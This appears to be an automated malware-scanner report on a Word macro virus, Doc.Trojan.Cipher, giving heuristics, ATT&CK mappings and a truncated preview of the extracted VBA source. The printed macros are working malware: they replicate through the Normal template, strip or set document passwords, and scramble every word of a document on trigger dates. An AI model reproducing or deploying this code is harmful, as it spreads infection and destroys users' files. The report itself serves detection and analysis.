MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains legacy WordBasic auto-exec markers and VBA macros, including AutoOpen and Auto_Close. Critical heuristics indicate the use of the Shell() function within the VBA code, which is used to execute arbitrary commands. The presence of these elements strongly suggests a macro-based malware dropper. The document body's content is nonsensical and appears to be a distraction.
Heuristics 7
-
ClamAV: Doc.Trojan.Cipher-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Cipher-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27288 bytes |
SHA-256: bac174fb9d01a1c187629bc1ce006e9ad1601f5ae369f1752841a4cbf448a31e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Cipher"
Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const SWP_HIDEWINDOW = &H80
Sub AutoNew()
Attribute AutoNew.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoNew.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoNew"
On Local Error Resume Next
For Each Modul In NormalTemplate.VBProject.VBComponents
If Modul.Name = "Cipher" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
End If
Next Modul
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoOpen"
Dim MacroInDoc As Boolean
On Local Error GoTo esco
MacroInDoc = False
For Each Modul In ActiveDocument.VBProject.VBComponents
If Modul.Name = "Cipher" Then
MacroInDoc = True
End If
Next Modul
If MacroInDoc = False Then
AutoNew
Else
For Each Modul In NormalTemplate.VBProject.VBComponents
If Modul.Name = "Cipher" Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
End If
Next Modul
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
End If
If ActiveDocument.HasPassword = True Then ActiveDocument.Password = ""
If ActiveDocument.WriteReserved = True Then ActiveDocument.WritePassword = ""
If Timer > 79200 Then
ActiveDocument.Password = "MisterCipher"
End If
If WeekDay(DateValue(Format(Now, "dd/mm/yyyy"))) = 6 Then
If Format(Now, "dd") = "17" Then spreadIB
End If
If Format(Now, "dd") = "31" Then spreadIB
If Format(Now, "dd/mm") = "25/04" Then spreadIB
ActiveDocument.Save
esco:
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoClose"
AutoOpen
On Local Error GoTo ferma
If Timer > 79200 Then
MsgBox "I say to you that it's " + Format(Now, "hh:mm") + Chr(13) + "It's too late. You must finish to work before next time!!!" + Chr(13) + Chr(9) + "Bye,Bye", vbInformation, "Time Signal"
hideb
End If
If Format(Now, "dd/mm") = "25/04" Then
cphrdoc
GoTo ferma
End If
If WeekDay(DateValue(Format(Now, "dd/mm/yyyy"))) = 6 Then
If Timer > 57600 And Timer < 72000 Then
cphrdoc
End If
End If
ferma:
End Sub
Sub cphrdoc()
Attribute cphrdoc.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute cphrdoc.VB_ProcData.VB_Invoke_Func = "Project.Cipher.cphrdoc"
Dim parola As String
Dim temp As String * 1
Dim a As Integer
Dim x As Long
Dim i As Integer
Dim parmod As String
Dim myname As String
Dim mypos As Long
On Local Error GoTo esch
Randomize Timer
For x = 1 To ActiveDocument.Words.Count - 1
parola = ActiveDocument.Words(x).Text
parmod = ""
For i = 1 To Len(parola)
a = Int(Rnd * 10 + 2)
temp = Mid(parola, i, 1)
temp = Chr$((Asc(temp) * a) Mod 256)
parmod = parmod + temp
Next i
ActiveDocument.Words(x).Text = parmod
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.